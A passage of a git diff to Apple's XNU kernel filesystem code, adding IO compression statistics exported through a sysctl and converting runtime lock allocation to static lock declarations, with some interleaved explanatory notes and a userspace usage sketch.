+       ctx->current_ptr = current_ptr;
+
+       return VNODE_RETURNED;
+}
+
+static int
+vfs_iocs_callback(mount_t mp, void *arg)
+{
+       if (mp->mnt_flag & MNT_LOCAL) {
+               vnode_iterate(mp, VNODE_ITERATE_ALL, vnode_iocs_callback, arg);
+       }
+
+       return VFS_RETURNED;
+}
+
+extern long numvnodes;
+
+static int
+sysctl_io_compression_dump_stats SYSCTL_HANDLER_ARGS
+{
+#pragma unused (arg1, arg2, oidp)
+
+       int32_t error = 0;
+       uint32_t inp_flag = 0;
+       uint32_t ret_len;
+
+       if (io_compression_stats_enable == 0) {
+               error = EINVAL;
+               goto out;
+       }
+
+       if ((req->newptr != USER_ADDR_NULL) && (req->newlen == sizeof(uint32_t))) {
+               error = SYSCTL_IN(req, &inp_flag, sizeof(uint32_t));
+               if (error) {
+                       goto out;
+               }
+               switch (inp_flag) {
+               case IOCS_SYSCTL_LIVE:
+               case IOCS_SYSCTL_STORE_BUFFER_RD_ONLY:
+               case IOCS_SYSCTL_STORE_BUFFER_MARK:
+                       break;
+               default:
+                       error = EINVAL;
+                       goto out;
+               }
+       } else {
+               error = EINVAL;
+               goto out;
+       }
+
+       if (req->oldptr == USER_ADDR_NULL) {
+               /* Query to figure out size of the buffer */
+               if (inp_flag & IOCS_SYSCTL_LIVE) {
+                       req->oldidx = numvnodes * sizeof(struct iocs_store_buffer_entry);
+               } else {
+                       /* Buffer size for archived case, let's keep it
+                        * simple and return IOCS store buffer size */
+                       req->oldidx = IOCS_STORE_BUFFER_SIZE;
+               }
+               goto out;
+       }
+
+       if (inp_flag & IOCS_SYSCTL_LIVE) {
+               struct vnode_iocs_context ctx;
+
+               bzero(&ctx, sizeof(struct vnode_iocs_context));
+               ctx.addr = req;
+               vfs_iterate(0, vfs_iocs_callback, &ctx);
+               req->oldidx = ctx.current_ptr;
+               goto out;
+       }
+
+       /* reading from store buffer */
+       lck_mtx_lock(&iocs_store_buffer_lock);
+
+       if (iocs_store_buffer.buffer == NULL) {
+               error = EINVAL;
+               goto release;
+       }
+       if (iocs_sb_bytes_since_last_mark == 0) {
+               req->oldidx = 0;
+               goto release;
+       }
+
+       int expected_size = 0;
+       /* Dry run to figure out the amount of space required to copy out the
+        * iocs_store_buffer.buffer */
+       if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) {
+               expected_size = iocs_store_buffer.current_position - iocs_store_buffer.marked_point;
+       } else {
+               expected_size = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point;
+               expected_size += iocs_store_buffer.current_position;
+       }
+
+       if (req->oldlen < expected_size) {
+               error = ENOMEM;
+               req->oldidx = 0;
+               goto release;
+       }
+
+       if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) {
+               error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point,
+                   req->oldptr,
+                   iocs_store_buffer.current_position - iocs_store_buffer.marked_point);
+               if (error) {
+                       req->oldidx = 0;
+                       goto release;
+               }
+               ret_len = iocs_store_buffer.current_position - iocs_store_buffer.marked_point;
+       } else {
+               error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point,
+                   req->oldptr,
+                   IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point);
+               if (error) {
+                       req->oldidx = 0;
+                       goto release;
+               }
+               ret_len = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point;
+
+               error = copyout(iocs_store_buffer.buffer,
+                   req->oldptr + ret_len,
+                   iocs_store_buffer.current_position);
+               if (error) {
+                       req->oldidx = 0;
+                       goto release;
+               }
+               ret_len += iocs_store_buffer.current_position;
+       }
+
+       req->oldidx = ret_len;
+       if ((ret_len != 0) && (inp_flag & IOCS_SYSCTL_STORE_BUFFER_MARK)) {
+               iocs_sb_bytes_since_last_mark = 0;
+               iocs_store_buffer.marked_point = iocs_store_buffer.current_position;
+       }
+release:
+       lck_mtx_unlock(&iocs_store_buffer_lock);
+
+out:
+       return error;
+}
+SYSCTL_PROC(_vfs, OID_AUTO, io_compression_dump_stats, CTLFLAG_WR | CTLTYPE_NODE, 0, 0, sysctl_io_compression_dump_stats, "-", "");
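A hedged userspace sketch of how this node might be consumed; the IOCS_SYSCTL_* flag value and the iocs_store_buffer_entry layout come from kernel headers and are assumptions here, and vfs.io_compression_stats_enable must be set to 1 first or the handler returns EINVAL:

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/sysctl.h>

    #define IOCS_SYSCTL_LIVE 0x1    /* assumed value; the real one is in the kernel header */

    int
    main(void)
    {
            uint32_t flag = IOCS_SYSCTL_LIVE;
            size_t len = 0;

            /* first call with no output buffer: the handler reports the size needed */
            if (sysctlbyname("vfs.io_compression_dump_stats", NULL, &len, &flag, sizeof(flag)) != 0) {
                    perror("sysctlbyname(size)");
                    return 1;
            }

            void *buf = malloc(len);
            if (buf == NULL) {
                    return 1;
            }

            /* second call copies out one iocs_store_buffer_entry per live vnode with stats */
            if (sysctlbyname("vfs.io_compression_dump_stats", buf, &len, &flag, sizeof(flag)) != 0) {
                    perror("sysctlbyname(read)");
                    free(buf);
                    return 1;
            }
            printf("copied %zu bytes of IO compression stats\n", len);
            free(buf);
            return 0;
    }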
+
+errno_t
+vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket)
+{
+       if (vp == NULL) {
+               return EINVAL;
+       }
+
+       if (size_bucket >= IOCS_BLOCK_NUM_SIZE_BUCKETS) {
+               return EINVAL;
+       }
+
+       if (vp->io_compression_stats == NULL) {
+               io_compression_stats_t iocs = (io_compression_stats_t)zalloc_flags(io_compression_stats_zone, Z_ZERO);
+               if (iocs == NULL) {
+                       return ENOMEM;
+               }
+               vnode_lock_spin(vp);
+               /* Re-check with lock */
+               if (vp->io_compression_stats == NULL) {
+                       vp->io_compression_stats = iocs;
+               } else {
+                       zfree(io_compression_stats_zone, iocs);
+               }
+               vnode_unlock(vp);
+       }
+       OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->block_compressed_size_dist[size_bucket]);
+
+       return 0;
+}
+
+errno_t
+vnode_updateiocompressionbufferstats(__unused vnode_t vp, __unused uint64_t uncompressed_size, __unused uint64_t compressed_size, __unused uint32_t size_bucket, __unused uint32_t compression_bucket)
+{
+       if (vp == NULL) {
+               return EINVAL;
+       }
+
+       /* vnode_updateiocompressionblockstats will always be called before vnode_updateiocompressionbufferstats.
+        * Hence vp->io_compression_stats should already be allocated */
+       if (vp->io_compression_stats == NULL) {
+               return EINVAL;
+       }
+
+       if ((size_bucket >= IOCS_BUFFER_NUM_SIZE_BUCKETS) || (compression_bucket >= IOCS_BUFFER_NUM_COMPRESSION_BUCKETS)) {
+               return EINVAL;
+       }
+
+       OSAddAtomic64(uncompressed_size, &vp->io_compression_stats->uncompressed_size);
+       OSAddAtomic64(compressed_size, &vp->io_compression_stats->compressed_size);
+
+       OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->buffer_size_compression_dist[size_bucket][compression_bucket]);
+
+       return 0;
+}
diff --git a/bsd/vfs/vfs_io_compression_stats.h b/bsd/vfs/vfs_io_compression_stats.h
new file mode 100644 (file)
index 0000000..decec8d
--- /dev/null
@@ -0,0 +1,65 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_
+#define _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_
+
+#include <sys/buf_internal.h>
+#include <sys/vnode.h>
+
+void io_compression_stats_init(void);
+void io_compression_stats(buf_t bp);
+
+#define IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE (4 * 1024)
+#define IO_COMPRESSION_STATS_MIN_BLOCK_SIZE (4 * 1024)
+#define IO_COMPRESSION_STATS_MAX_BLOCK_SIZE (1024 * 1024 * 1024)
+
+#if IO_COMPRESSION_STATS_DEBUG
+#define io_compression_stats_dbg(fmt, ...) \
+       printf("%s: " fmt "\n", __func__, ## __VA_ARGS__)
+#else
+#define io_compression_stats_dbg(fmt, ...)
+#endif
+
+/* iocs_store_buffer: Buffer that captures the stats of vnodes as they are reclaimed */
+struct iocs_store_buffer {
+       void*                   buffer;
+       uint32_t                current_position;
+       uint32_t                marked_point;
+};
+
+#define IOCS_STORE_BUFFER_NUM_SLOTS 10000
+#define IOCS_STORE_BUFFER_SIZE (IOCS_STORE_BUFFER_NUM_SLOTS * (sizeof(struct iocs_store_buffer_entry)))
+
+/* Notify user when the buffer is 80% full */
+#define IOCS_STORE_BUFFER_NOTIFY_AT ((IOCS_STORE_BUFFER_SIZE * 8) / 10)
+
+/* Wait for the buffer to be 10% more full before notifying again */
+#define IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL (IOCS_STORE_BUFFER_SIZE / 10)
+
+#endif
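Reading these thresholds together with vnode_iocs_record_and_free() above, they reduce to entry counts that are independent of sizeof(struct iocs_store_buffer_entry):

    /*
     * IOCS_STORE_BUFFER_NUM_SLOTS = 10000 slots (the ring wraps after 10000 records)
     * IOCS_STORE_BUFFER_NOTIFY_AT             -> more than 8000 unread entries since the last mark
     * IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL -> more than 1000 new entries since the last notification
     *
     * i.e. userspace is poked once the ring is ~80% full of unread records, and
     * then at most once per further ~1000 reclaimed vnodes until it marks the buffer.
     */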
index 6a170010522207512d6300fbd254ee25271a790d..efe27e3e06ea347fc4c73491d9f989dd994c438a 100644 (file)
@@ -125,7 +125,7 @@ static int              lookup_handle_emptyname(struct nameidata *ndp, struct co
 static int              lookup_handle_rsrc_fork(vnode_t dp, struct nameidata *ndp, struct componentname *cnp, int wantparent, vfs_context_t ctx);
 #endif
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 /*
  * Convert a pathname into a pointer to a locked inode.
@@ -356,7 +356,7 @@ retry_copy:
         * determine the starting point for the translation.
         */
        proc_dirs_lock_shared(p);
-       lck_rw_lock_shared(rootvnode_rw_lock);
+       lck_rw_lock_shared(&rootvnode_rw_lock);
 
        if (!(fdp->fd_flags & FD_CHROOT)) {
                ndp->ni_rootdir = rootvnode;
@@ -371,7 +371,7 @@ retry_copy:
                        /* This should be a panic */
                        printf("fdp->fd_rdir is not set\n");
                }
-               lck_rw_unlock_shared(rootvnode_rw_lock);
+               lck_rw_unlock_shared(&rootvnode_rw_lock);
                proc_dirs_unlock_shared(p);
                error = ENOENT;
                goto error_out;
@@ -397,7 +397,7 @@ retry_copy:
 
        if (dp == NULLVP || (dp->v_lflag & VL_DEAD)) {
                dp = NULLVP;
-               lck_rw_unlock_shared(rootvnode_rw_lock);
+               lck_rw_unlock_shared(&rootvnode_rw_lock);
                proc_dirs_unlock_shared(p);
                error = ENOENT;
                goto error_out;
@@ -440,7 +440,7 @@ retry_copy:
        }
 
        /* Now that we have our usecount, release the locks */
-       lck_rw_unlock_shared(rootvnode_rw_lock);
+       lck_rw_unlock_shared(&rootvnode_rw_lock);
        proc_dirs_unlock_shared(p);
 
        ndp->ni_dvp = NULLVP;
@@ -477,7 +477,7 @@ retry_copy:
                                startdir_with_usecount = NULLVP;
                        }
                        if (rootdir_with_usecount) {
-                               lck_rw_lock_shared(rootvnode_rw_lock);
+                               lck_rw_lock_shared(&rootvnode_rw_lock);
                                if (rootdir_with_usecount == rootvnode) {
                                        old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed);
                                        if (old_count < 2) {
@@ -489,7 +489,7 @@ retry_copy:
                                        }
                                        rootdir_with_usecount = NULLVP;
                                }
-                               lck_rw_unlock_shared(rootvnode_rw_lock);
+                               lck_rw_unlock_shared(&rootvnode_rw_lock);
                                if (rootdir_with_usecount) {
                                        vnode_rele(rootdir_with_usecount);
                                        rootdir_with_usecount = NULLVP;
@@ -537,7 +537,7 @@ error_out:
                startdir_with_usecount = NULLVP;
        }
        if (rootdir_with_usecount) {
-               lck_rw_lock_shared(rootvnode_rw_lock);
+               lck_rw_lock_shared(&rootvnode_rw_lock);
                if (rootdir_with_usecount == rootvnode) {
                        old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed);
                        if (old_count < 2) {
@@ -547,9 +547,9 @@ error_out:
                                panic("(4) Unexpected pre-decrement value (%d) of usecount for rootvnode %p",
                                    old_count, rootdir_with_usecount);
                        }
-                       lck_rw_unlock_shared(rootvnode_rw_lock);
+                       lck_rw_unlock_shared(&rootvnode_rw_lock);
                } else {
-                       lck_rw_unlock_shared(rootvnode_rw_lock);
+                       lck_rw_unlock_shared(&rootvnode_rw_lock);
                        vnode_rele(rootdir_with_usecount);
                }
                rootdir_with_usecount = NULLVP;
index b58c75e27d7c37db1f7660011013cea73ed08ab2..6fd297c9d41d3779777cef310684f81dc5f8f41e 100644 (file)
 
 
 /* vars for quota file lock */
-lck_grp_t       * qf_lck_grp;
-lck_grp_attr_t  * qf_lck_grp_attr;
-lck_attr_t      * qf_lck_attr;
+static LCK_GRP_DECLARE(qf_lck_grp, "quota file");
 
 /* vars for quota list lock */
-lck_grp_t       * quota_list_lck_grp;
-lck_grp_attr_t  * quota_list_lck_grp_attr;
-lck_attr_t      * quota_list_lck_attr;
-lck_mtx_t       * quota_list_mtx_lock;
+static LCK_GRP_DECLARE(quota_list_lck_grp, "quota list");
+static LCK_MTX_DECLARE(quota_list_mtx_lock, &quota_list_lck_grp);
 
 /* Routines to lock and unlock the quota global data */
 static int dq_list_lock(void);
@@ -131,41 +127,6 @@ static int  qf_ref(struct quotafile *);
 static void qf_rele(struct quotafile *);
 
 
-/*
- * Initialize locks for the quota system.
- */
-void
-dqinit(void)
-{
-       /*
-        * Allocate quota list lock group attribute and group
-        */
-       quota_list_lck_grp_attr = lck_grp_attr_alloc_init();
-       quota_list_lck_grp = lck_grp_alloc_init("quota list", quota_list_lck_grp_attr);
-
-       /*
-        * Allocate qouta list lock attribute
-        */
-       quota_list_lck_attr = lck_attr_alloc_init();
-
-       /*
-        * Allocate quota list lock
-        */
-       quota_list_mtx_lock = lck_mtx_alloc_init(quota_list_lck_grp, quota_list_lck_attr);
-
-
-       /*
-        * allocate quota file lock group attribute and group
-        */
-       qf_lck_grp_attr = lck_grp_attr_alloc_init();
-       qf_lck_grp = lck_grp_alloc_init("quota file", qf_lck_grp_attr);
-
-       /*
-        * Allocate quota file lock attribute
-        */
-       qf_lck_attr = lck_attr_alloc_init();
-}
-
 /*
  * Report whether dqhashinit has been run.
  */
@@ -199,7 +160,7 @@ static volatile int dq_list_lock_cnt = 0;
 static int
 dq_list_lock(void)
 {
-       lck_mtx_lock(quota_list_mtx_lock);
+       lck_mtx_lock(&quota_list_mtx_lock);
        return ++dq_list_lock_cnt;
 }
 
@@ -218,7 +179,7 @@ dq_list_lock_val(void)
 void
 dq_list_unlock(void)
 {
-       lck_mtx_unlock(quota_list_mtx_lock);
+       lck_mtx_unlock(&quota_list_mtx_lock);
 }
 
 
@@ -230,7 +191,7 @@ dq_lock_internal(struct dquot *dq)
 {
        while (dq->dq_lflags & DQ_LLOCK) {
                dq->dq_lflags |= DQ_LWANT;
-               msleep(&dq->dq_lflags, quota_list_mtx_lock, PVFS, "dq_lock_internal", NULL);
+               msleep(&dq->dq_lflags, &quota_list_mtx_lock, PVFS, "dq_lock_internal", NULL);
        }
        dq->dq_lflags |= DQ_LLOCK;
 }
@@ -253,21 +214,21 @@ dq_unlock_internal(struct dquot *dq)
 void
 dqlock(struct dquot *dq)
 {
-       lck_mtx_lock(quota_list_mtx_lock);
+       lck_mtx_lock(&quota_list_mtx_lock);
 
        dq_lock_internal(dq);
 
-       lck_mtx_unlock(quota_list_mtx_lock);
+       lck_mtx_unlock(&quota_list_mtx_lock);
 }
 
 void
 dqunlock(struct dquot *dq)
 {
-       lck_mtx_lock(quota_list_mtx_lock);
+       lck_mtx_lock(&quota_list_mtx_lock);
 
        dq_unlock_internal(dq);
 
-       lck_mtx_unlock(quota_list_mtx_lock);
+       lck_mtx_unlock(&quota_list_mtx_lock);
 }
 
 
@@ -288,7 +249,7 @@ qf_get(struct quotafile *qfp, int type)
                        }
                        if ((qfp->qf_qflags & QTF_CLOSING)) {
                                qfp->qf_qflags |= QTF_WANTED;
-                               msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL);
+                               msleep(&qfp->qf_qflags, &quota_list_mtx_lock, PVFS, "qf_get", NULL);
                        }
                }
                if (qfp->qf_vp != NULLVP) {
@@ -308,7 +269,7 @@ qf_get(struct quotafile *qfp, int type)
 
                while ((qfp->qf_qflags & QTF_OPENING) || qfp->qf_refcnt) {
                        qfp->qf_qflags |= QTF_WANTED;
-                       msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL);
+                       msleep(&qfp->qf_qflags, &quota_list_mtx_lock, PVFS, "qf_get", NULL);
                }
                if (qfp->qf_vp == NULLVP) {
                        qfp->qf_qflags &= ~QTF_CLOSING;
@@ -405,7 +366,7 @@ dqfileinit(struct quotafile *qfp)
        qfp->qf_vp = NULLVP;
        qfp->qf_qflags = 0;
 
-       lck_mtx_init(&qfp->qf_lock, qf_lck_grp, qf_lck_attr);
+       lck_mtx_init(&qfp->qf_lock, &qf_lck_grp, LCK_ATTR_NULL);
 }
 
 
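The hunks above drop the boot-time dqinit() allocations in favor of locks that exist from link time. A minimal sketch of the pattern this file adopts, using illustrative names rather than identifiers from the commit (LCK_GRP_DECLARE, LCK_MTX_DECLARE and the lck_mtx_* calls are the interfaces the hunks themselves use):

    #include <kern/locks.h>

    /* group and mutex are static objects; no init routine is needed */
    static LCK_GRP_DECLARE(example_lck_grp, "example subsystem");
    static LCK_MTX_DECLARE(example_mtx, &example_lck_grp);

    static int example_state;

    static void
    example_update(int v)
    {
            /* note the '&': the mutex is now an object, not a heap pointer */
            lck_mtx_lock(&example_mtx);
            example_state = v;
            lck_mtx_unlock(&example_mtx);
    }

The same conversion recurs throughout the commit: lck_grp_alloc_init()/lck_mtx_alloc_init() pairs disappear, and each lock, unlock and msleep site gains an '&' because the lock is no longer allocated at runtime.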
index 4ae72ee3d3cf9a4f4cdff1112f2a23e607cc06d7..cadd662a6836b2680ce2b050e46ab3362599cfc8 100644 (file)
 #include <vfs/vfs_disk_conditioner.h>
 #include <libkern/section_keywords.h>
 
-extern lck_grp_t *vnode_lck_grp;
-extern lck_attr_t *vnode_lck_attr;
+static LCK_GRP_DECLARE(vnode_lck_grp, "vnode");
+static LCK_ATTR_DECLARE(vnode_lck_attr, 0, 0);
 
 #if CONFIG_TRIGGERS
-extern lck_grp_t *trigger_vnode_lck_grp;
-extern lck_attr_t *trigger_vnode_lck_attr;
+static LCK_GRP_DECLARE(trigger_vnode_lck_grp, "trigger_vnode");
+static LCK_ATTR_DECLARE(trigger_vnode_lck_attr, 0, 0);
 #endif
 
-extern lck_mtx_t mnt_list_mtx_lock;
+extern lck_mtx_t mnt_list_mtx_lock;
 
 ZONE_DECLARE(specinfo_zone, "specinfo",
     sizeof(struct specinfo), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM);
@@ -172,7 +172,6 @@ int     vttoif_tab[9] = {
        S_IFSOCK, S_IFIFO, S_IFMT,
 };
 
-
 /* XXX These should be in a BSD accessible Mach header, but aren't. */
 extern void             memory_object_mark_used(
        memory_object_control_t         control);
@@ -259,6 +258,13 @@ TAILQ_HEAD(ragelst, vnode) vnode_rage_list;     /* vnode rapid age list */
 struct timeval rage_tv;
 int     rage_limit = 0;
 int     ragevnodes = 0;
+
+int   deadvnodes_low = 0;
+int   deadvnodes_high = 0;
+
+uint64_t newvnode = 0;
+uint64_t newvnode_nodead = 0;
+
 static  int vfs_unmountall_started = 0;
 
 #define RAGE_LIMIT_MIN  100
@@ -348,6 +354,7 @@ static int print_busy_vnodes = 0;                               /* print out bus
        } while(0)
 
 static void async_work_continue(void);
+static void vn_laundry_continue(void);
 
 /*
  * Initialize the vnode management data structures.
@@ -370,11 +377,19 @@ vntblinit(void)
                rage_limit = RAGE_LIMIT_MIN;
        }
 
+       deadvnodes_low = (desiredvnodes) / 100;
+       if (deadvnodes_low > 300) {
+               deadvnodes_low = 300;
+       }
+       deadvnodes_high = deadvnodes_low * 2;
+
        /*
         * create worker threads
         */
        kernel_thread_start((thread_continue_t)async_work_continue, NULL, &thread);
        thread_deallocate(thread);
+       kernel_thread_start((thread_continue_t)vn_laundry_continue, NULL, &thread);
+       thread_deallocate(thread);
 }
 
 /* the timeout is in 10 msecs */
@@ -461,7 +476,7 @@ vnode_hasdirtyblks(vnode_t vp)
        struct cl_writebehind *wbp;
 
        /*
-        * Not taking the buf_mtxp as there is little
+        * Not taking the buf_mtx as there is little
         * point doing it. Even if the lock is taken the
         * state can change right after that. If their
         * needs to be a synchronization, it must be driven
@@ -488,7 +503,7 @@ int
 vnode_hascleanblks(vnode_t vp)
 {
        /*
-        * Not taking the buf_mtxp as there is little
+        * Not taking the buf_mtx as there is little
         * point doing it. Even if the lock is taken the
         * state can change right after that. If their
         * needs to be a synchronization, it must be driven
@@ -903,7 +918,7 @@ mount_iterdrain(mount_t mp)
 {
        mount_list_lock();
        while (mp->mnt_iterref) {
-               msleep((caddr_t)&mp->mnt_iterref, mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL);
+               msleep((caddr_t)&mp->mnt_iterref, &mnt_list_mtx_lock, PVFS, "mount_iterdrain", NULL);
        }
        /* mount iterations drained */
        mp->mnt_iterref = -1;
@@ -1308,7 +1323,7 @@ cache_purge_callback(mount_t mp, __unused void * arg)
        return VFS_RETURNED;
 }
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 extern void set_rootvnode(vnode_t);
 
 
@@ -1655,7 +1670,7 @@ vfs_switch_root(const char *incoming_vol_old_path,
                pmi->pm_mount = pmi->pm_rootvnode->v_mount;
        }
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
 
        /* Setup incoming as the new rootfs */
        lck_rw_lock_exclusive(&incoming->mnt_rwlock);
@@ -1701,6 +1716,11 @@ vfs_switch_root(const char *incoming_vol_old_path,
        vnode_unlock(outgoing_vol_new_covered_vp);
        lck_rw_done(&outgoing->mnt_rwlock);
 
+       if (!(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV) &&
+           (TAILQ_FIRST(&mountlist) == outgoing)) {
+               vfs_setmntsystem(outgoing);
+       }
+
        /*
         * Finally, remove the mount_t linkage from the previously covered
         * vnodes on the old root volume. These were incoming_vol_old_path,
@@ -1734,7 +1754,7 @@ vfs_switch_root(const char *incoming_vol_old_path,
         * prevents concurrent vnode_lookups.
         */
        set_rootvnode(incoming_rootvnode);
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
 
        if (!(incoming->mnt_kern_flag & MNTK_VIRTUALDEV) &&
            !(outgoing->mnt_kern_flag & MNTK_VIRTUALDEV)) {
@@ -2888,7 +2908,14 @@ vclean(vnode_t vp, int flags)
        }
 
 #if CONFIG_MACF
-       mac_vnode_notify_reclaim(vp);
+       if (vp->v_mount) {
+               /*
+                * It is possible for bdevvp vnodes to not have a mount
+                * pointer. It's fine to let it get reclaimed without
+                * notifying.
+                */
+               mac_vnode_notify_reclaim(vp);
+       }
 #endif
 
        if (active && (flags & DOCLOSE)) {
@@ -2968,6 +2995,12 @@ vclean(vnode_t vp, int flags)
        }
 #endif
 
+#if CONFIG_IO_COMPRESSION_STATS
+       if ((vp->io_compression_stats)) {
+               vnode_iocs_record_and_free(vp);
+       }
+#endif /* CONFIG_IO_COMPRESSION_STATS */
+
        /*
         * Reclaim the vnode.
         */
@@ -3472,7 +3505,7 @@ extension_cmp(const void *a, const void *b)
 // them (i.e. a short 8 character name can't have an 8
 // character extension).
 //
-extern lck_mtx_t *pkg_extensions_lck;
+extern lck_mtx_t pkg_extensions_lck;
 
 __private_extern__ int
 set_package_extensions_table(user_addr_t data, int nentries, int maxwidth)
@@ -3503,7 +3536,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth)
 
        qsort(new_exts, nentries, maxwidth, extension_cmp);
 
-       lck_mtx_lock(pkg_extensions_lck);
+       lck_mtx_lock(&pkg_extensions_lck);
 
        old_exts        = extension_table;
        old_nentries    = nexts;
@@ -3512,7 +3545,7 @@ set_package_extensions_table(user_addr_t data, int nentries, int maxwidth)
        nexts           = nentries;
        max_ext_width   = maxwidth;
 
-       lck_mtx_unlock(pkg_extensions_lck);
+       lck_mtx_unlock(&pkg_extensions_lck);
 
        kheap_free(KHEAP_DATA_BUFFERS, old_exts,
            (old_nentries * old_maxwidth) + 1);
@@ -3550,7 +3583,7 @@ is_package_name(const char *name, int len)
        // advance over the "."
        name_ext++;
 
-       lck_mtx_lock(pkg_extensions_lck);
+       lck_mtx_lock(&pkg_extensions_lck);
 
        // now iterate over all the extensions to see if any match
        ptr = &extension_table[0];
@@ -3558,12 +3591,12 @@ is_package_name(const char *name, int len)
                extlen = strlen(ptr);
                if (strncasecmp(name_ext, ptr, extlen) == 0 && name_ext[extlen] == '\0') {
                        // aha, a match!
-                       lck_mtx_unlock(pkg_extensions_lck);
+                       lck_mtx_unlock(&pkg_extensions_lck);
                        return 1;
                }
        }
 
-       lck_mtx_unlock(pkg_extensions_lck);
+       lck_mtx_unlock(&pkg_extensions_lck);
 
        // if we get here, no extension matched
        return 0;
@@ -3814,6 +3847,8 @@ out:
 struct unmount_info {
        int     u_errs; // Total failed unmounts
        int     u_busy; // EBUSY failed unmounts
+       int     u_count; // Total volumes iterated
+       int     u_only_non_system;
 };
 
 static int
@@ -3823,18 +3858,27 @@ unmount_callback(mount_t mp, void *arg)
        char *mntname;
        struct unmount_info *uip = arg;
 
-       mount_ref(mp, 0);
-       mount_iterdrop(mp);     // avoid vfs_iterate deadlock in dounmount()
+       uip->u_count++;
 
        mntname = zalloc(ZV_NAMEI);
        strlcpy(mntname, mp->mnt_vfsstat.f_mntonname, MAXPATHLEN);
 
-       error = dounmount(mp, MNT_FORCE, 1, vfs_context_current());
-       if (error) {
-               uip->u_errs++;
-               printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error);
-               if (error == EBUSY) {
-                       uip->u_busy++;
+       if (uip->u_only_non_system
+           && ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM))) { //MNTK_BACKS_ROOT
+               printf("unmount(%d) %s skipped\n", uip->u_only_non_system, mntname);
+               mount_iterdrop(mp);     // VFS_ITERATE_CB_DROPREF
+       } else {
+               printf("unmount(%d) %s\n", uip->u_only_non_system, mntname);
+
+               mount_ref(mp, 0);
+               mount_iterdrop(mp);     // VFS_ITERATE_CB_DROPREF
+               error = dounmount(mp, MNT_FORCE, 1, vfs_context_current());
+               if (error) {
+                       uip->u_errs++;
+                       printf("Unmount of %s failed (%d)\n", mntname ? mntname:"?", error);
+                       if (error == EBUSY) {
+                               uip->u_busy++;
+                       }
                }
        }
        if (mntname) {
@@ -3850,21 +3894,23 @@ unmount_callback(mount_t mp, void *arg)
  * Busy mounts are retried.
  */
 __private_extern__ void
-vfs_unmountall(void)
+vfs_unmountall(int only_non_system)
 {
        int mounts, sec = 1;
        struct unmount_info ui;
 
        vfs_unmountall_started = 1;
+       printf("vfs_unmountall(%ssystem) start\n", only_non_system ? "non" : "");
 
 retry:
-       ui.u_errs = ui.u_busy = 0;
+       ui.u_errs = ui.u_busy = ui.u_count = 0;
+       ui.u_only_non_system = only_non_system;
+       // avoid vfs_iterate deadlock in dounmount(), use VFS_ITERATE_CB_DROPREF
        vfs_iterate(VFS_ITERATE_CB_DROPREF | VFS_ITERATE_TAIL_FIRST, unmount_callback, &ui);
        mounts = mount_getvfscnt();
        if (mounts == 0) {
                return;
        }
-
        if (ui.u_busy > 0) {            // Busy mounts - wait & retry
                tsleep(&nummounts, PVFS, "busy mount", sec * hz);
                sec *= 2;
@@ -3872,10 +3918,12 @@ retry:
                        goto retry;
                }
                printf("Unmounting timed out\n");
-       } else if (ui.u_errs < mounts) {
+       } else if (ui.u_count < mounts) {
                // If the vfs_iterate missed mounts in progress - wait a bit
                tsleep(&nummounts, PVFS, "missed mount", 2 * hz);
        }
+
+       printf("vfs_unmountall(%ssystem) end\n", only_non_system ? "non" : "");
 }
 
 /*
@@ -4201,15 +4249,13 @@ vfs_init_io_attributes(vnode_t devvp, mount_t mp)
 }
 
 static struct klist fs_klist;
-lck_grp_t *fs_klist_lck_grp;
-lck_mtx_t *fs_klist_lock;
